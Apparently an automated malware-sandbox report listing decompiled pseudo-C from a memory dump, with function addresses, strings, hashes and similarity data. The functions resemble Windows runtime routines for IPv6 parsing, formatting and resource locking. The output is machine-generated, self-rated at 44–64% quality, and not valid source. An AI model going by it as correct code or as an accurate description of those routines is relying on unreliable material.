						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E02058980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0204DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02080CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02080CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E020806BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E020806BA(_t135, _t178) == 0 || E02080A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E02080CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02080CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E020806BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E020806BA(_t124, _t142) == 0 || E02080A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x02080b21
0x02080b24
0x02080b27
0x02080b2a
0x02080b2d
0x02080b30
0x02080b33
0x02080b36
0x02080b39
0x02080b3e
0x02080c65
0x02080c68
0x02080c6a
0x02080c6f
0x020aeb42
0x00000000
0x00000000
0x020aeb48
0x020aeb48
0x02080c75
0x02080c7a
0x020aeb54
0x00000000
0x00000000
0x00000000
0x020aeb5a
0x02080c80
0x02080c84
0x020aeb98
0x00000000
0x00000000
0x020aeba6
0x02080cb8
0x02080cba
0x02080cd3
0x02080cda
0x02080ce4
0x02080ce9
0x00000000
0x02080cec
0x02080c8c
0x020aeb63
0x00000000
0x00000000
0x020aeb70
0x020aeb75
0x020aeb7d
0x00000000
0x00000000
0x020aeb8c
0x00000000
0x020aeb8c
0x02080c96
0x00000000
0x00000000
0x02080ca2
0x02080cac
0x02080cb4
0x00000000
0x00000000
0x02080b44
0x02080b47
0x02080b49
0x00000000
0x00000000
0x02080b4f
0x02080b50
0x00000000
0x00000000
0x02080b56
0x02080b62
0x02080b7c
0x02080bac
0x02080a0f
0x020aeaaa
0x00000000
0x020aeac4
0x020aeac4
0x02080bd0
0x02080bd0
0x02080bd4
0x02080bd9
0x00000000
0x00000000
0x02080bdb
0x02080be0
0x020aeb0e
0x02080a1a
0x00000000
0x02080a1a
0x020aeb1a
0x020aeb1f
0x020aeb27
0x00000000
0x00000000
0x020aeb36
0x00000000
0x020aeb36
0x02080bea
0x00000000
0x00000000
0x02080bf6
0x02080c00
0x02080c03
0x02080c0b
0x00000000
0x02080c0b
0x020aeaaa
0x00000000
0x02080a15
0x02080bb6
0x00000000
0x02080bc6
0x02080bc6
0x02080bcb
0x02080c15
0x00000000
0x00000000
0x02080c1d
0x02080c20
0x02080c21
0x02080c24
0x02080c24
0x02080c26
0x00000000
0x02080c26
0x02080bcd
0x00000000
0x02080bcd
0x02080b89
0x02080b89
0x02080b90
0x00000000
0x00000000
0x02080b96
0x00000000
0x02080b96
0x02080a04
0x02080a04
0x02080b9a
0x02080b9a
0x02080b9b
0x02080b9f
0x00000000
0x00000000
0x00000000
0x02080ba5
0x02080ac7
0x02080aca
0x020aeacf
0x00000000
0x020aeade
0x020aeade
0x020aeae3
0x00000000
0x00000000
0x020aeaf3
0x020aeaf6
0x020aeaf7
0x020aeafe
0x020aeb01
0x00000000
0x020aeb01
0x020aeacf
0x02080ad0
0x02080ad4
0x00000000
0x00000000
0x02080ada
0x02080ae6
0x02080c34
0x00000000
0x02080c47
0x02080c49
0x02080c4a
0x02080c4e
0x02080c51
0x02080c54
0x02080c57
0x02080c5a
0x00000000
0x00000000
0x00000000
0x02080c60
0x02080afb
0x02080afe
0x02080b02
0x02080b05
0x02080b08
0x00000000
0x02080b08
0x02080ae6
0x02080b44
0x020809f8
0x020809f8
0x020809f9
0x00000000
0x00000000
0x020aeaa0
0x00000000

APIs

__fassign.LIBCMT ref: 02080BF6
__fassign.LIBCMT ref: 02080CA2

Strings

:, xrefs: 02080BA9
., xrefs: 02080A0C
:, xrefs: 02080AC7

Memory Dump Source

Source File: 00000009.00000002.2363188404.0000000002030000.00000040.00000001.sdmp, Offset: 02020000, based on PE: true

Associated: 00000009.00000002.2363182275.0000000002020000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363271363.0000000002110000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363277175.0000000002120000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363282413.0000000002124000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363287147.0000000002127000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363291649.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363347301.0000000002190000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: 67de3c3d8d1a02aaccdedbe8416d8a0de3e91dbac82d4f40e72628eeb15c3f83
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 26A1CD7190030AEEDF25EFA4C8547BFBBB6AF04308F24846AD992A7240D730964DEB51

Uniqueness

Uniqueness Score: -1.00%

Function 02080554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E02080554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x021201c0;
									_push(_t144);
									_push(0);
									_t51 = E0203F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E02084FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02093F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02093F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E020C217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02093F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E02083915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x021201c0;
												_push(_t138);
												_push(0);
												_t58 = E0203F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E02084FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02093F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02093F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E020C217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02093F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E02083915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E02065384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0203F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E02083915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0203F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E02083915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0203F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E02083915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E02065329(_t110, _t138);
																return E020653A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}

0x0208055a
0x0208055d
0x02080563
0x02080566
0x020805d8
0x020805e2
0x020805e5
0x00000000
0x020805e7
0x020805e7
0x020805ea
0x020805f3
0x020805f3
0x02080568
0x02080568
0x02080568
0x02080569
0x02080569
0x02080569
0x0208056b
0x00000000
0x00000000
0x020a217f
0x020a2183
0x020a225b
0x020a225f
0x020a2189
0x020a218c
0x020a218f
0x020a2194
0x020a2199
0x020a219d
0x020a21a0
0x020a21a2
0x020a21ce
0x020a21ce
0x020a21ce
0x020a21d0
0x020a21d6
0x020a21de
0x020a21e2
0x020a21e8
0x020a21e9
0x020a21ec
0x020a21f1
0x020a21f6
0x00000000
0x00000000
0x020a21f8
0x020a21fb
0x020a2206
0x020a220b
0x020a220c
0x020a2217
0x020a2226
0x020a222b
0x020a222c
0x020a222f
0x020a2232
0x020a2235
0x020a2235
0x020a223a
0x020a223f
0x020a2241
0x020a2243
0x020a2248
0x020a2248
0x020a224d
0x020a224f
0x020a2262
0x020a2263
0x020a2268
0x020a2269
0x020a2269
0x020a2269
0x020a226d
0x00000000
0x00000000
0x020a2276
0x020a2279
0x020a227e
0x020a2283
0x020a2287
0x020a228a
0x020a228d
0x020a228f
0x020a22bc
0x020a22bc
0x020a22bc
0x020a22be
0x020a22c4
0x020a22cc
0x020a22d0
0x020a22d6
0x020a22d7
0x020a22da
0x020a22df
0x020a22e4
0x00000000
0x00000000
0x020a22e6
0x020a22e9
0x020a22f4
0x020a22f9
0x020a22fa
0x020a2305
0x020a2314
0x020a2319
0x020a231a
0x020a231d
0x020a2320
0x020a2323
0x020a2323
0x020a2328
0x020a232d
0x020a232f
0x020a2331
0x020a2336
0x020a2336
0x020a233b
0x020a233d
0x020a2350
0x020a2351
0x020a2356
0x020a2359
0x020a2359
0x020a235b
0x020a235d
0x02065367
0x0206536b
0x02065372
0x00000000
0x00000000
0x00000000
0x00000000
0x020a2363
0x020a2363
0x020a2369
0x020a236a
0x020a236c
0x020a2371
0x020a2373
0x00000000
0x020a2379
0x020a2379
0x020a237a
0x020a237f
0x020a237f
0x020a2385
0x020a2386
0x020a2389
0x020a238e
0x020a2390
0x02065378
0x0206537c
0x020a2396
0x020a2396
0x020a2397
0x020a239c
0x020a23a2
0x020a23a3
0x020a23a6
0x020a23ab
0x020a23ad
0x00000000
0x020a23b3
0x020a23b3
0x020a23b4
0x020a23b9
0x020a23ba
0x020a23ba
0x020a23bc
0x020a23bf
0x00000000
0x00000000
0x02099153
0x02099158
0x0209915a
0x0209915e
0x02099160
0x00000000
0x02099166
0x02099166
0x02099171
0x02099176
0x02099176
0x00000000
0x02099160
0x020a23c6
0x020a23d7
0x020a23d7
0x020a23ad
0x020a2390
0x020a2373
0x020a233f
0x020a233f
0x00000000
0x020a233f
0x020a2291
0x020a2291
0x020a2293
0x020a2295
0x020a229a
0x020a22a1
0x020a22a3
0x020a22a7
0x020a22a9
0x00000000
0x00000000
0x020a22ab
0x020a22ad
0x020a22af
0x00000000
0x00000000
0x00000000
0x020a22af
0x020a22b1
0x020a22b4
0x020a22b4
0x020a22b6
0x020653be
0x020653be
0x020653be
0x020653c0
0x00000000
0x00000000
0x020653cb
0x020653ce
0x020653d0
0x020653d4
0x020653d6
0x00000000
0x020653d8
0x020653e3
0x020653ea
0x020653ea
0x00000000
0x020653d6
0x00000000
0x00000000
0x00000000
0x00000000
0x020a22b6
0x00000000
0x020a228f
0x020a2349
0x020a234d
0x020a2251
0x020a2251
0x00000000
0x020a2251
0x020a21a4
0x020a21a4
0x020a21a6
0x020a21a8
0x020a21ac
0x020a21b6
0x020a21b8
0x020a21bc
0x020a21be
0x00000000
0x00000000
0x020a21c0
0x020a21c2
0x020a21c4
0x00000000
0x00000000
0x00000000
0x020a21c4
0x020a21c6
0x020a21c6
0x020a21c8
0x00000000
0x00000000
0x00000000
0x00000000
0x020a21c8
0x020a21a2
0x00000000
0x020a2183
0x0208057b
0x0208057d
0x02080581
0x02080583
0x020a2178
0x00000000
0x02080589
0x0208058f
0x0208058f
0x02080583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 020A2206

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 020A220E
RTL: Resource at %p, xrefs: 020A221D, 020A230B
RTL: Re-Waiting, xrefs: 020A223A, 020A2328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 020A22FC

Memory Dump Source

Source File: 00000009.00000002.2363188404.0000000002030000.00000040.00000001.sdmp, Offset: 02020000, based on PE: true

Associated: 00000009.00000002.2363182275.0000000002020000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363271363.0000000002110000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363277175.0000000002120000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363282413.0000000002124000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363287147.0000000002127000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363291649.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363347301.0000000002190000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: 3daf2c5a1438dc2daab8ace32016168340fc878fc95337de205ef6ad0faabb95
Instruction ID: 97d207e1b2f552a6aeaec5e812119bf03d397467f9dcbdb5dbd85e1892a419f0
Opcode Fuzzy Hash: 3daf2c5a1438dc2daab8ace32016168340fc878fc95337de205ef6ad0faabb95
Instruction Fuzzy Hash: 495125717003116FEB55DB58CC90FA673EAAF94720F218279EC55DF285EA21EC41ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 020814C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E020814C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x2122088; // 0x767c8233
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E02077707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E020813CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E02077707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E02077707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E02042340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0204E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x020814c0
0x020814cb
0x020814d2
0x020814d6
0x020814da
0x020814de
0x020814e3
0x0208157a
0x0208157a
0x020814f1
0x020814f3
0x020aea0f
0x00000000
0x020aea15
0x00000000
0x020aea15
0x020814f9
0x020814f9
0x020814fe
0x02081504
0x020aea1a
0x020aea1f
0x020aea21
0x020aea22
0x020aea27
0x020aea2a
0x020aea2a
0x02081515
0x02081517
0x0208156d
0x02081572
0x02081575
0x02081575
0x0208151e
0x020aea50
0x020aea55
0x020aea58
0x020aea58
0x0208152e
0x02081531
0x02081533
0x00000000
0x02081535
0x02081541
0x02081549
0x02081549
0x02081533
0x020814f3
0x02081559

APIs

___swprintf_l.LIBCMT ref: 020AEA22

Part of subcall function 020813CB: ___swprintf_l.LIBCMT ref: 0208146B
Part of subcall function 020813CB: ___swprintf_l.LIBCMT ref: 02081490

___swprintf_l.LIBCMT ref: 0208156D

Strings

]:%u, xrefs: 020AEA47
%%%u, xrefs: 02081564

Memory Dump Source

Source File: 00000009.00000002.2363188404.0000000002030000.00000040.00000001.sdmp, Offset: 02020000, based on PE: true

Associated: 00000009.00000002.2363182275.0000000002020000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363271363.0000000002110000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363277175.0000000002120000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363282413.0000000002124000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363287147.0000000002127000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363291649.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363347301.0000000002190000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 34fe918236c3a0f0eafeec7918a8aa2a167af07c85bccd96f9c1da010f6528ce
Instruction ID: 4cdf00441a7d121ebe7ec1066c042cd656cb9bacd610d3e50f854f60156c06b4
Opcode Fuzzy Hash: 34fe918236c3a0f0eafeec7918a8aa2a167af07c85bccd96f9c1da010f6528ce
Instruction Fuzzy Hash: DD2193B2900319EBDB61EE54CC40AEFB3EDAF10704F444565EC8AD7140DB70AA59DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 020653A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E020653A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x021201c0;
									_push(_t92);
									_push(0);
									_t37 = E0203F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E02084FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E02093F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E02093F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E020C217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02093F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E02083915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E02065384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0203F970( *((intOrPtr*)(_t92 + 0x18)));
